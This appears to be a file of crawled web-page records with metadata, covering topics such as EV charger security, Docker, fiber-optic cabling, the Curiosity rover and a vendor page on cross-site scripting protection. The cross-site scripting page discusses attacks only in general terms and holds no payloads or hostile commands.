The vision of electric cars call for charge stations to perform smart charging as part of a global smart grid. As a result, a charge station is a sophisticated computer that communicates with the electric grid on one side and the car on the other. To make matters worse, it’s installed outside on street corners and in parking lots. Electric vehicle charging stations bring with them new security challenges that show similar issues as found in SCADA systems, even if they use different technologies. In this video recorded at Hack In The Box 2013 Amsterdam, Ofer Shezaf, founder of OWASP Israel, talks about what charge stations really are, why they have to be “smart’ and the potential risks created to the grid, to the car and most importantly to its owner’s privacy and safety.
<urn:uuid:8bc2fd78-4cc2-4041-a256-65de6991b309>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2013/05/15/hacking-charge-stations-for-electric-cars/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00238-ip-10-171-10-108.ec2.internal.warc.gz
en
0.961941
165
3.078125
3
Next role for robots: data center diagnosticians The U.S. Department of Energy last month opened the Energy Systems Integration Facility, a $135 million research center designed to test how power grids, data centers and other IT systems can be made more energy-efficient. In fact, the center itself, located in Golden, Colo., might be the most energy-efficient data center in the world. One of the systems on its research plan might include the use of robots for energy management and conservation. Recently IBM and EMC developed robots designed to rove data centers and collect temperature, power usage and other data that could affect the performance of data center IT systems. Cooling alone can account for more than 60 to 70 percent of data center power costs, according to EMC officials, liabilities that can mount up as organizations buy more capacity than needed and overcool their systems. Around 85 percent of data centers also mismanage the provisioning of infrastructure, which increases energy consumption, according to EMC officials. The EMC Data Center Robot helps combat these problems by patrolling for temperature fluctuations, humidity and system vibrations and locating sources of cooling leaks and other vulnerabilities. EMC’s DC Robot collects data via digital sensors and sends it through a Wi-Fi connection for processing. An algorithm converts the temperature data into a thermal map, which can be used to identify anomalous hot and cold spots in data center aisles. Most data centers use a set of fixed sensors to manage temperatures and other energy consumption indicators, an expense that can run into the millions of dollars – “low hanging fruit” that helped justify their investment in the DC Robot, say EMC officials. While the DC Robot was one of the first data center energy-focused robots, IBM has developed a similar model, which it offers as part of an energy management troubleshooting service. The firm's Measurement and Management Technologies unit will use the robo-tool to create a "robotic cooling assessment," a three-dimensional temperature and humidity maps to help organizations identify energy sinks and other problem spots in their data centers. The assessment determines a data center’s baseline and high-level cooling capacity. A third energy diagnostics tool, from Purkay Labs, is a simple portable unit that checks energy-environment data for short or long term intervals. The unit consists of an adjustable carbon fiber rod that measures the air quality at three different heights. While not mobile and so technically not a robot, “It’s a product that we’ve developed so you can get the temp across the entire aisle,” said CEO Indra Purkayastha. Posted by GCN Staff on Aug 30, 2013 at 11:31 AM
<urn:uuid:604dd8c5-bad1-423a-be95-d09e226ec4c2>
CC-MAIN-2017-09
https://gcn.com/blogs/pulse/2013/08/data-center-robots.aspx?admgarea=TC_EmergingTech
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00414-ip-10-171-10-108.ec2.internal.warc.gz
en
0.920262
558
2.609375
3
Black Box Explains...50-micron vs. 62.5-micron fiber optic cable As today’s networks expand, the demand for more bandwidth and greater distances increases. Gigabit Ethernet and the emerging 10 Gigabit Ethernet are becoming the applications of choice for current and future networking needs. Thus, there is a renewed interest in 50-micron fiber optic cable. First used in 1976, 50-micron cable has not experienced the widespread use in North America that 62.5-micron cable has. To support campus backbones and horizontal runs over 10-Mbps Ethernet, 62.5 fiber, introduced in 1986, was and still is the predominant fiber optic cable because it offers high bandwidth and long distance. One reason 50-micron cable did not gain widespread use was because of the light source. Both 62.5 and 50-micron fiber cable can use either LED or laser light sources. But in the 1980s and 1990s, LED light sources were common. Since 50-micron cable has a smaller aperture, the lower power of the LED light source caused a reduction in the power budget compared to 62.5-micron cable—thus, the migration to 62.5-micron cable. At that time, laser light sources were not highly developed and were rarely used with 50-micron cable—mostly in research and technological applications. The cables share many characteristics. Although 50-micron fiber cable features a smaller core, which is the light-carrying portion of the fiber, both 50- and 62.5-micron cable use the same glass cladding diameter of 125 microns. Because they have the same outer diameter, they’re equally strong and are handled in the same way. In addition, both types of cable are included in the TIA/EIA 568-B.3 standards for structured cabling and connectivity. As with 62.5-micron cable, you can use 50-micron fiber in all types of applications: Ethernet, FDDI, 155-Mbps ATM, Token Ring, Fast Ethernet, and Gigabit Ethernet. It is recommended for all premise applications: backbone, horizontal, and intrabuilding connections, and it should be considered especially for any new construction and installations. IT managers looking at the possibility of 10 Gigabit Ethernet and future scalability will get what they need with 50-micron cable. The big difference between 50-micron and 62.5-micron cable is in bandwidth. The smaller 50-micron core provides a higher 850-nm bandwidth, making it ideal for inter/intrabuilding connections. 50-micron cable features three times the bandwidth of standard 62.5-micron cable. At 850-nm, 50-micron cable is rated at 500 MHz/km over 500 meters versus 160 MHz/km for 62.5-micron cable over 220 meters. Fiber Type: 62.5/125 µm Minimum Bandwidth (MHz-km): 160/500 Distance at 850 nm: 220 m Distance at 1310 nm: 500 m Fiber Type: 50/125 µm Minimum Bandwidth (MHz-km): 500/500 Distance at 850 nm: 500 m Distance at 1310 nm: 500 m As we move towards Gigabit Ethernet, the 850-nm wavelength is gaining importance along with the development of improved laser technology. Today, a lower-cost 850-nm laser, the Vertical-Cavity Surface-Emitting Laser (VCSEL), is becoming more available for networking. This is particularly important because Gigabit Ethernet specifies a laser light source. Other differences between the two types of cable include distance and speed. The bandwidth an application needs depends on the data transmission rate. Usually, data rates are inversely proportional to distance. As the data rate (MHz) goes up, the distance that rate can be sustained goes down. So a higher fiber bandwidth enables you to transmit at a faster rate or for longer distances. In short, 50-micron cable provides longer link lengths and/or higher speeds in the 850-nm wavelength. For example, the proposed link length for 50-micron cable is 500 meters in contrast with 220 meters for 62.5-micron cable. Standards now exist that cover the migration of 10-Mbps to 100-Mbps or 1 Gigabit Ethernet at the 850-nm wavelength. The most logical solution for upgrades lies in the connectivity hardware. The easiest way to connect the two types of fiber in a network is through a switch or other networking “box.“ It is not recommended to connect the two types of fiber directly.
<urn:uuid:cb743aaa-ee02-451f-9acd-505041443c09>
CC-MAIN-2017-09
https://www.blackbox.com/en-us/products/black-box-explains/black-box-explains-50-micron-vs-62-5-micron-fiber-optic-cable
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00414-ip-10-171-10-108.ec2.internal.warc.gz
en
0.896837
961
2.78125
3
A research area of mathematics is being used to simplify spreadsheet formulas by providing users with a library of downloadable spreadsheet components. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. Oxford researcher and consultant Jocelyn Paine has set up a Web-based software library for Excel users called the Ireson-Paine Spreadsheet Parts Repository, which will stock modules for users to download and "glue" into their own spreadsheets. These will do calculations that users find difficult or risky to program themselves. Jocelyn wants suggestions for suitable modules. The idea is based on "category theory" which takes mathematical ideas such as "sum" - putting things together - and abstracts them into universal concepts applicable to diverse situations. Computer scientists can use this concept to formalise what happens when the modules are strong together to make programs.
<urn:uuid:3fe2fcc1-d80f-4382-abec-36a61dc76748>
CC-MAIN-2017-09
http://www.computerweekly.com/news/2240084091/Oxford-researcher-offers-tool-to-ease-spreadsheet-complexity
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00534-ip-10-171-10-108.ec2.internal.warc.gz
en
0.922011
186
2.53125
3
Copy wide characters from one buffer to another #include <wchar.h> wchar_t * wmemmove( wchar_t * ws1, const wchar_t * ws2, size_t n ); - A pointer to where you want the function to copy the data. - A pointer to the buffer that you want to copy data from. - The number of wide characters to copy. Use the -l c option to qcc to link against this library. This library is usually included automatically. The memmove() function copies n wide characters from the buffer pointed to by ws2 to the buffer pointed to by ws1. This function copies overlapping regions safely. The wmemmove() function is locale-independent and treats all wchar_t values identically, even if they're null or invalid characters. Use wmemcpy() for greater speed when copying buffers that don't overlap. A pointer to the destination buffer (i.e. the same pointed as ws1). Last modified: 2014-06-24
<urn:uuid:8be61a6a-3d98-414f-953c-e5c44582fbec>
CC-MAIN-2017-09
http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/w/wmemmove.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00058-ip-10-171-10-108.ec2.internal.warc.gz
en
0.816078
227
2.671875
3
A long time ago, a computer program was a stack of punch cards, and moving the program from computer to computer was easy as long as you didn't drop the box. Every command, instruction, and subroutine was in one big, fat deck. Editors, compilers, and code repositories have liberated us from punch cards, but somehow deploying software has grown more complicated. Moving a program from the coding geniuses to the production team is fraught with errors, glitches, and hassles. There's always some misconfiguration, and it's never as simple as carrying that deck down the hall. Into this world comes open source Docker, the latest layer of virtualization to bundle everything together in a stable package or, in the current parlance, "container." (If the computer industry ever runs out of synonyms for "box," we're in big trouble.) The software opens up the process of creating and building virtual machines to anyone who can work with the Linux command line. You put the instructions for starting up your machine in one file called the Dockerfile, issue the build command, and voilà, your new machine is running in its own Shangri-La or Private Idaho or La-La Land. (Choose your own metaphor.) If you take the right steps down the path to creating a Dockerfile, the results can be incredible. I whipped up a few virtual machines in a few minutes, and the building and deploying process was lightning quick. Anyone who has waited for other virtualization layers to start up will be surprised by how quickly you can type docker run and watch the virtual machine spring to life. This might be because Docker containers are typically more lightweight than traditional virtual machines. I suspect it might also be because everything runs from the command line. There are no mouse clicks to distract Docker. It's all about communicating with other machines through shell scripts, not those pesky humans who need cute icons in their GUIs. Life with Docker is tightly integrated with the Linux command line. Docker depends entirely upon the hooks for containers in the newer versions of the Linux kernel, which allow isolated bundles of apps, services, and the libraries they depend on to live side by side on the Linux host. The Linux kernel team did most of the clever work, and now Docker is making it easy for people to access the power. The simplest way to use it is with a newer version of Ubuntu (say, 12.04) or one of the close cousins. There are instructions for using Docker with Mac OS X or Windows, but they involve installing VirtualBox and running the Linux kernel in a virtual machine. Docker containers are built out of text written in the Dockerfile, the equivalent of the make file. There's not much to the syntax. Most of the lines in a Dockerfile will begin with RUN, which passes the rest of the line to the instance inside the container. These are usually lines that say things like RUN sudo apt-get install.... Much of the code in the Dockerfile is a shell script for building your machine and installing the software you need. The real action occurs when you start playing with the other commands that poke holes in the container's flexible layer. The command ADD . /src maps your current directory and makes it appear inside the container as the directory src. I used it to put some Web pages for the version of Node.js I fired up inside a container. My Web page appeared to be both outside and inside the virtual world at the same time, but it seems like this is an illusion. Docker is really zipping up your files and passing a copy. You will also poke holes in the container for the TCP/IP ports, mapping the ports of the existing machine to the ports inside the container. Two clever tricks start the moment when you ask Docker to build the machine. First, you can start accessing previously built containers from Docker's repositories. Most of the standard distros are there, as well as a number of common configurations with tools like MongoDB. You can ADD these slices to your Dockerfile and they'll be downloaded to your new machine. The basic repository is public, but the company behind the Docker project is looking into building private repositories for enterprise work. The second is the way the new machine is built up with slices, much like a coldcut sandwich. Docker is clever enough to keep the changes in layers, potentially saving space and complexity. The changes you make are stored separately as diffs between the containers. These diffs are also mobile, and it's possible to juggle them to deploy your software. Your developers create the container with all the right libraries, then hand it over to the ops staff, which treats it like a little box that just needs to run. For all of the cleverness, though, it's important to recognize that the software is very new and some parts are being redesigned as I type this. The Docker website says, "Please note Docker is currently under heavy development. It should not be used in production (yet)." The project plans to have an official release of a new version each month. It also notes that the current master branch of the open repository is the current release candidate. You can get it and build it yourself. From what I saw, Docker is far enough along to be used in lightweight projects that don't overstress the machine or risk damage if something fails. Many report issues with stuck containers and "ghosts" that clog up machines. These can be swept away by restarting everything, a bit of a pain that undermines one of the selling points of the lightning-quick layer of virtualization. The bigger danger for you is that the Docker team will revise the API or add a new feature that trashes your hard work. This is bound to happen because I already stumbled upon several deprecated commands. The development team is also starting to tackle the growing pains that emerge when a project goes from a fun experiment for hackers to a serious part of infrastructure. Docker just announced a new "responsible security" program to help people report holes. While the Docker sandbox may stop some security leaks, it is quite new and relatively untested. Is there a way for one Docker container to reach inside another running next door? It's certainly not part of the official API, but these are untested waters. I wouldn't trust my bitcoin password at Mt. Gox to a Docker container. Some of these qualms might be eased by the company's decision to open-source the code under the generous Apache 2.0 license. Developers can see the code and -- if they have the time -- look for the kind of holes that should be patched. The company wants to encourage non-employees to contribute, so it's working to broaden the team of developers to extend outside the company. This is paying off in a burgeoning community of startups that want to add something to the Docker ecosystem. Companies like Tutum, Orchard, and StackDock, for instance, let you build up your Dockerfile interactively in a browser. When it's done, you push a button, and it's deployed to their cloud at prices that begin at $5 per month for 1GB of RAM. There are others like Quay.io, which offers to host your Docker repositories, and Serf, a service discovery and orchestration tool that will help Docker containers learn about one another. There are also plenty of other, more established corners of the devops world, including Chef and Puppet, that are taking notice and adapting to the new opportunity to let users build Dockerfiles. This list of names will probably change by the time you read this because it's one of the most exciting segments of a very dynamic world. There will be plenty of mergers, flameouts, and new startups in this area. These startups show the promise of the technology. StackDock, for instance, lets you assemble your machine from a few standard cards. These will be kept cached locally, and all the machines will start with the same OS and kernel for now. This can dramatically reduce the memory devoted to keeping the same copy of the OS for all of the instances. Build once, run anywhere Several people I've spoken with sounded a bit leery when hearing there was another virtual machine solution promising to make code that runs almost anywhere. They've lived through the interest in Pascal, Java, and the rest. The difference is that Docker is much more narrowly focused on packaging the Linux machines that act as the backbone of the Internet. There are no pretenses of taking over the desktop or any other part of the computing world. Docker doesn't want to translate some neutral byte code into local binaries. It wants to package x86 code that works with the Linux kernel. These are simpler goals. Docker began as a tool to help the developer package up a Linux application, and even after all the hype, it remains just that: a container-building tool that works efficiently and cleverly. Will it sweep through data centers? Many Linux developers will love it. They'll be able to build up nice machines on their desk and ship them off to the cloud without having to waste extra time figuring out how to reconfigure their cloud. Docker shifts the focus to the most important part of the equation: the app. Instead of buying multiple machine instances, they'll be buying compute time. It's entirely possible that many of the clouds will morph into farms for running Docker containers. There's no doubt that the ease and simplicity of Docker mean that many will start incorporating it into their stacks. It will become one of the preferred ways to ship around code. But for all of its promise, I still feel like everything is a bit too new. Toward the end of the process, I started wondering about this entire operation. It's wholly possible to put a Docker container inside a Vagrant or VirtualBox VM that is sitting on the operating system. If this is a cloud machine, the operating system itself could be sitting on some hypervisor. There's plenty of virtualization going on. If it were a thriller mystery, the protagonist would be peeling off masks again and again and again. At its root, Docker is solving a problem caused by a failure of operating system design. The old ideas of isolating users and jobs in an operating system aren't good enough. Somehow the developers and the staff need another, more powerful force field to stop the software from messing with each package. The success of Docker is one step toward this redesign, but it's clearly more of a Band-Aid than the kind of unifying vision that the operating system world needs. Who knows when this newer, better, and cleaner model will emerge, but until it does, Docker is one of the simplest ways of using some virtual duct tape to wall off the applications from each other. The issues with ghosts and disk space will be solved. The tool will become less command-line driven. Anyone building software to run in production on Linux boxes will love the flexibility it brings, and that will drive plenty of interest over the next five years.
<urn:uuid:b2d0ccb0-6d04-4ec8-b97f-9efb0764f3e7>
CC-MAIN-2017-09
http://www.computerworld.com.au/article/539785/first_look_docker_better_way_deploy_your_apps/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00058-ip-10-171-10-108.ec2.internal.warc.gz
en
0.949204
2,251
2.609375
3
Remember learning about ozone? It was easy to relate to that distinctive smell that signaled the onset of precipitation. Even the chemical formula had a simple elegance, O3. We learned that a ring of these triatomic molecules created a protective buffer way up in the earth’s atmosphere, and that this layer filters out up to 99 percent of the sun’s harmful UV radiation, which would otherwise cause DNA damage in humans and animals. Ozone has a bit of a dual nature, however: a life-sustaining substance at higher altitudes becomes an air pollutant when it occurs at ground-level. And at higher concentrations, it can cause cause serious health problems. Scientists had already established that ozone concentrations, both in the atmosphere and on the earth’s surface, are linked to meteorological conditions, like temperature and prevailing winds, so perhaps long-term climate patterns would have a role to play as well. Eleni Katragkou, a climate scientist at Aristotle University of Thessalonikihe (AUTh) in Greece, decided to test this hypothesis. She wanted “to predict ozone behaviour in a changing climate, in order to be able assess the impacts on air quality, human health, agricultural production and ecosystems.” “People with lung diseases, children, older adults, and people who are active outdoors may be particularly sensitive to ozone,” Katragkou explained. “[Ozone] also affects sensitive vegetation and can damage crop production and ecosystems.” Using the grid computing resources of the AUTh computing centre (an EGI site), Katragkou’s team performed a series of regional climate-air quality simulations for two future decades (2041–2050 and 2091–2100) and one control decade (1991-2000) to study the impact of climate change on surface ozone in Europe. The simulations relied on an established climate model, called scenario A1B, developed by the Intergovernmental Panel on Climate Change (IPCC). The conclusions, published in the Journal of Geophysical Research, indicate that levels of ground level ozone are set to increase near the end of the century, with the highest concentrations expected for south-west Europe. The grid resources were crucial for the accuracy of the model, and allowed the simulations to be done in a reasonable time frame. Performed on a single desktop computer, the same job would have taken 40 years to complete. “The usual bottleneck for performing those types of simulations at a finer resolution is the huge demands on CPU time. This makes me think that grid computing may facilitate very much our future work in this direction,” Katragkou stated.
<urn:uuid:671d846d-41dd-433b-ba7e-bddcd328f340>
CC-MAIN-2017-09
https://www.hpcwire.com/2013/01/25/grid_facilitates_ozone_predictions/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00058-ip-10-171-10-108.ec2.internal.warc.gz
en
0.94575
552
3.96875
4
Data scientists and those adept at scientific computing are numerous, but not quite numerous enough to meet the demands of the computing marketplace. Further, as science progresses to more complex and data-intensive questions, such as researching the beginning of the universe or getting more in-depth genomic results, it becomes imperative for more scientists and researchers to learn these HPC techniques to cut down on query times. Randall J. Leveque, Professor of Applied Mathematics and Adjunct Professor of Mathematics at the University of Washington in Seattle, will be conducting a free course that brings the principles of parallelism in high performance computers to the people who are running applications on multi-processor laptops and desktops or on cloud services. Leveque’s principle is that a person’s time is more valuable than a computer’s time. As such, any research query or scientific question that you can parallelize on your computer’s multiple processors or via a cloud server is a benefit. However, a fast program is of course useless if that program produces inaccurate results. “The goal is not to teach the most advanced techniques with supercomputers, but rather techniques that you can use immediately on your own laptop, desktop, cluster, or even in the cloud,” Leveque remarked in his introductory video below. The ten week course, which will require ten to twelve work hours per week, will cover both serial and parallel computing and the computing languages that dictate them, such as Fortran 90, OpenMP, MPI, and Python. The full list of what it is to be covered is below: - Working at the command line in Unix-like shells (e.g. Linux or a Mac OSX terminal). - Version control systems, particularly git, and the use of Github and Bitbucket repositories. - Work habits for documentation of your code and reproducibility of your results. - Interactive Python using IPython, and the IPython Notebook. - Python scripting and its uses in scientific computing. - Subtleties of computer arithmetic that can affect program correctness. - How numbers are stored: binary vs. ASCII representations, efficient I/O. - Fortran 90, a compiled language that is widely used in scientific computing. - Makefiles for building software and checking dependencies. - The high cost of data communication. Registers, cache, main memory, and how this memory hierarchy affects code performance. - OpenMP on top of Fortran for parallel programming of shared memory computers, such as a multicore laptop. - MPI on top of Fortran for distributed memory parallel programming, such as on a cluster. - Parallel computing in IPython. - Debuggers, unit tests, regression tests, verification and validation of computer codes. - Graphics and visualization of computational results using Python. The course, which again is free to participate in, is scheduled to start on May 1st.
<urn:uuid:1c7cad83-1818-4482-bcc9-e1b405f93212>
CC-MAIN-2017-09
https://www.hpcwire.com/2013/04/10/leveque_course_offers_hpc_techniques_to_scientific_computing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00234-ip-10-171-10-108.ec2.internal.warc.gz
en
0.893121
608
2.96875
3
Fiber cross connect patch panel, also known as the fiber distribution panel, to terminate the fiber optic cable and provide access to the cable’s individual fibers for cross connection, commonly used for fiber optic management unit. It helps network technicians in minimizing the clutter of wires when setting up fiber optic cables, organize and distribute the optical cables and the branches. They are used to secure the splice units, and connectors. Benifit From Fiber Patch Panels The fiber optic patch panels can accommodate connector panels, connectors, fiber optic patch cords, associated trunk cables, and usually come with cable management. With the use of fiber optic patch cables, network technicians can easily connect cable fibers via cross connection, test the patch panel, and connect it to lightwave equipment. These patch panels are also used as a link demarcation point and in labeling the cable’s individual fibers. Fiber patch panels provide a convenient way to rearrange fiber cable connections and circuits. A simple patch panel is a metal frame containing bushings in which fiber optic cable connectors plug in on either side. One side of the panel is usually fixed, meaning that the fiber cables are not intended to be disconnected. On the other side of the panel, fiber cables can be connected and disconnected to arrange the circuits as required. A fiber optic patch panel is a built-in unit for fiber optics management. It has an appearance of a box enclosure. However, it does more than just serve as protection to several sets of fibers being used for communications. It can also serve as a mechanism in which you can handle the fibers easily and conveniently to serve your purpose. It is here that you can route fiber optic cables, add connections, or put a stop to its functions just as the ordinary junction box does to your electrical wires. With telephone companies, cable TV and Internet service providers now using fiber optics to deliver services to your home, you may find it necessary to install one of this in your home. Componets Of Fiber Patch Panel A fiber patch panel usually is composed of two parts, the compartment that contains fiber adapters (bulkhead receptacles), and the compartment that contains fiber optic splice trays and excess fiber cables. If the entire installation, including the fiber optic hubs, repeaters, or network adapters, uses the same type of fiber optic connectors, then the array can be made of compatible adapters or jacks. The adaptors on a fiber-optic patch panel can come in a variety of different shapes. In most panels, all of the adapters are of the same type, but if there is more than one type of fiber optic connector used within the network, it may be necessary to get a panel with hybrid adapters. These types of adapters can be used to connect different types of connectors on fiber-optic cables. There are two types of panels you can have. You can have either a wall-mounted one or a rack panel. A wall-mounted device, which, in its most basic form, can keep 12 different fibers separate from one another. If the fiber-optic cable has more than 12 fibers, the extra fibers can be moved to a second panel or an engineer can use a panel that is designed to hold more fibers separately. Wall-mounted panels can be constructed to hold up to 144 fibers at once. Wall mount fiber patch panels are space saving and light in weight, while they are strong structure and robust, waterproof. The fiber optic cables lines are designed to be easy to find and organize, optical fiber bend radius is ensured to safe level not to affect its performance. Rack mount fiber optic patch panels are made of high quality materials, it is sliding types like a drawer. Sliding the panel open gives an optical engineer easy access to the fibers inside.Inside the rack mount fiber patch panel there is trays and splice sleeves, accessories, optional pigtails with different types, common style is SC/FC/ST/LC, E2000 types can be custom made based on quantity. Both of rack mount and wall mount fiber optic patch panels can be custom made with different kinds of adapters and Fiber Pigtails pre-installed from FiberStore. If you do not have enough space in your place and if you do not have too many fiber optic cables around, you can have your panel mounted on a wall. Otherwise, you will need a rack on which you can place your cable panel.
<urn:uuid:2c705d7a-5b43-4f29-b5e2-1c6db6c1ae09>
CC-MAIN-2017-09
http://www.fs.com/blog/typtical-fiber-patch-panels-on-the-market.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00530-ip-10-171-10-108.ec2.internal.warc.gz
en
0.934481
897
2.703125
3
NASA's Mars rover Curiosity has already achieved its initial mission, proving that the Red Planet could have once sustained life, but one scientist says its greatest accomplishments could be in the year ahead. "It is all part of the evolution of our understanding of Mars," Lisa May, NASA's lead program executive for Mars, told Computerworld. "We are going chapter by chapter of your favorite mystery novel, making progress to understand, what was it like, was anything there and where did the water go? With Curiosity ... we're peeling away the layers of a very complex story of a planet that could have been a sibling, if not a twin to Earth, at some point." NASA's super rover, Curiosity, hits its second anniversary working on the Red Planet and has a series of scientific accomplishments under its belt. (Image: NASA) Curiosity hit a major milestone this week. The nuclear-powered, SUV-sized super rover landed on the surface of Mars on Aug. 5, 2012 PDT ( Aug. 6, 2012, EDT). For two years, the robotic rover has worked on Mars, searching for signs that the planet ever held life, even in microbial form. It also signifies that Curiosity had made it through its initial mission, which lasted the length of one Martian year, or about 687 days. That doesn't mean that scientists are finished with Curiosity. May said NASA will work with the rover as long as it's still functioning. "Curiosity has already met its mission success criteria, but there's always the intention of continuing as long as our spacecraft lets us," May said. "We have spent $2.5 billion to send this spacecraft to Mars, and we'll use it to learn and explore as long as we can." After a journey of more than eight months and traveling a distance of 350 million miles, Curiosity used a supersonic parachute, a tether and rockets to safely alight on Mars. NASA scientists called the time from when the spacecraft entered the Martian atmosphere to when it touched down on the planet's surface, " seven minutes of terror" because a 14-minute communication delay between a signal from Mars reaching the Earth meant they had no idea what was happening during that time. Once it was safely on the ground, scientists and engineers quickly set Curiosity to work, and in the past two years, the rover has made significant progress working on Mars. Here are the top five scientific discoveries Curiosity has made so far: 1.Ancient Mars could have held life: Thanks to Curiosity, scientists found that ancient Mars likely had the right chemistry to support living microbes, according to NASA. By drilling into Martian rocks, the rover discovered what are believed to be the key ingredients for life -- carbon, hydrogen, oxygen, phosphorus and sulfur. Analyzing the makeup of the rocks, the rover found clay minerals and not too much salt. That tells researchers there once might have been drinkable water on the Red Planet. "We have found the minerals that we are familiar with as the building blocks of life," May said. "We've also found places that had water, which was a source of energy. There were places where the water was neither too acidic nor too salty. There are areas where the environment would have been habitable billions of years ago. That's probably the biggest things we found." 2.Evidence of ancient water flows: Curiosity found rocks believed to have been smoothed and rounded by ancient water flows. The layers of exposed bedrock tell scientists a story of what was once a steady stream of water flowing about knee deep. "It is surprising how much water persists under the surface of Mars and how much water must have been there," May said. "What happened? It either went into the rocks or out through the atmosphere." 3. Curiosity detects dangerous levels of radiation: Curiosity detected radiation levels that exceed NASA's career limit for astronauts. With this data in hand, the space agency's engineers can build spacecraft and spacesuits that are able to protect humans on deep space missions. 4. No methane, no life? In September 2013, NASA noted that the rover had not found a single trace of methane in the Martian atmosphere, decreasing the odds that there is life on Mars. Since living organisms, as we know them, produce methane, scientists had been trying to find the substance on the Red Planet, as proof that life might have once existed there. The hunt for methane continues. 5. Significant geological diversity: Scientists were surprised by the variety of soil and rock that they found in the Gale Crater, where Curiosity landed. According to NASA, Curiosity found different types of gravel, streambed deposits, what could possibly be volcanic rock, water-transported sand dunes, mudstones, and cracks filled with mineral veins. All of these yield clues to Mars' past. Today, Curiosity is closing in on its first good look of its ultimate destination, Mount Sharp. NASA scientists have wanted Curiosity to study Mount Sharp and its geological layers since the robot landed on Mars Now, the rover is about two miles away and nearing an outcrop of a base layer of the mountain. "Oh, I think this coming year is going to be even more exciting," said May. "Because we're going to get more detailed stories and compare stratigraphic layers, we're really going to learn about the history of Mars." Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is firstname.lastname@example.org. Read more about government/industries in Computerworld's Government/Industries Topic Center. This story, "Mars Rover Curiosity's Top 5 Scientific Discoveries" was originally published by Computerworld.
<urn:uuid:42324a8f-d551-4471-8e70-d80f7c8c2db2>
CC-MAIN-2017-09
http://www.cio.com/article/2461494/government/mars-rover-curiositys-top-5-scientific-discoveries.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171043.28/warc/CC-MAIN-20170219104611-00230-ip-10-171-10-108.ec2.internal.warc.gz
en
0.971805
1,193
3.484375
3
Cross-site scripting has been at the top of both the OWASP Top Ten list and the CWE/SANS Top 25 repeatedly. Some reports show cross-site scripting, or XSS, vulnerabilities to be present in 7 out of 10 web sites while others report that up to 90 percent of all web sites are vulnerable to this type of attack. Why are so many sites at risk? Because cross-site scripting attacks are so easy to perform. Basically, an attacker inputs a malicious script into a web site. This can be in a forum, comment section, or any other input area. When victims visit that web site, they only need to click on that script to start the exploit. A few facts about cross-site scripting attacks that you should be aware of are: Attackers are lured to XSS exploits because how easy they are to perform, but they also know to follow the money. Attacking a web site through a cross-site scripting vulnerability can be quite profitable for the attacker who knows how to harness this type of exploit. Without proactive Web application security in place to stop XSS attacks, you leave your site vulnerable to: Web sites that have been exploited using XSS attacks have also been used to: With dotDefender web application firewall you can avoid XSS attacks because dotDefender inspects your HTTP traffic and determines if your web site suffers from cross-site scripting vulnerabilities or other attacks to stop web applications from being exploited. Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against cross-site scripting, SQL Injection attacks, path traversal and many other web attack techniques. The reasons dotDefender offers such a comprehensive solution to your web application security needs are: Before a web site can be compromised, an attacker needs to find applications that are vulnerable to XSS vulnerabilities. Unfortunately, most web applications, both Free/Open Source Software and commercial software, are susceptible. Attackers simply perform a Google search for terms that are often found in the software. Using search bots to automate this process means an attacker can find thousands of vulnerable web sites in minutes. Once a vulnerable web site is discovered, the attacker then examines the HTML to find where the exploit code can be injected. After this has been determined, the attacker then begins to code the exploit. There are three types of attacks that can be used: After the code has been written, it is then injected into the target site. Now that the script has been injected into the vulnerable site, the attacker can now begin to reap the rewards. If the intent of the XSS attack was to steal user authentication credentials, usernames and passwords are now collected. For attacks that center around keystroke logging, the attacker will begin to receive the logged results from the victims. If the intent was to inject spam links into a well trusted site, then the attacker will begin to see increased activity on their sites due to higher traffic and higher search engine results. If the attack was successful, the attacker will often replicate it on other sites to increase the potential reward. Cross-site scripting not only costs businesses in stolen data, but also by harming their reputation. Owners who work hard to build themselves as trusted site to deliver content, services, or products often find themselves hurt when loyal visitors lose trust in them after an attack. Visitors whose data is stolen or find their computers infected as the result of an innocent visit to your web site are hesitant to return even if assurances are made that the site is now clean. Even if a vulnerable site is fixed, sites that contained malicious code from an XSS exploit are usually flagged by Google and other search engines as a result. Resources spent in time and effort to restore a solid reputation with the search engines is an added cost that most web site owners never figure on. The threat posed by cross-site scripting attacks is not solitary. Combined with other vulnerabilities like SQL injections, path traversal, denial of service attacks, and buffer overflows the need for web site owners and administrators to be vigilant is not only important but overwhelming. dotDefender's unique security approach eliminates the need to learn the specific threats that exist on each web application. The software that runs dotDefender focuses on analyzing the request and the impact it has on the application. Effective web application security is based on three powerful web application security engines: Pattern Recognition, Session Protection and Signature Knowledgebase. The Pattern Recognition web application security engine employed by dotDefender effectively protects against malicious behavior such as SQL Injection and Cross Site Scripting. The patterns are regular expression-based and designed to efficiently and accurately identify a wide array of application-level attack methods. As a result, dotDefender is characterized by an extremely low false positive rate. What sets dotDefender apart is that it offers comprehensive protection against cross-site scripting and other attacks while being one of the easiest solutions to use. In just 10 clicks, a web administrator with no security training can have dotDefender up and running. Its predefined rule set offers out-of-the box protection that can be easily managed through a browser-based interface with virtually no impact on your server or web site’s performance.
<urn:uuid:8140cbc6-9d7b-412b-895d-4853aeb09b91>
CC-MAIN-2017-09
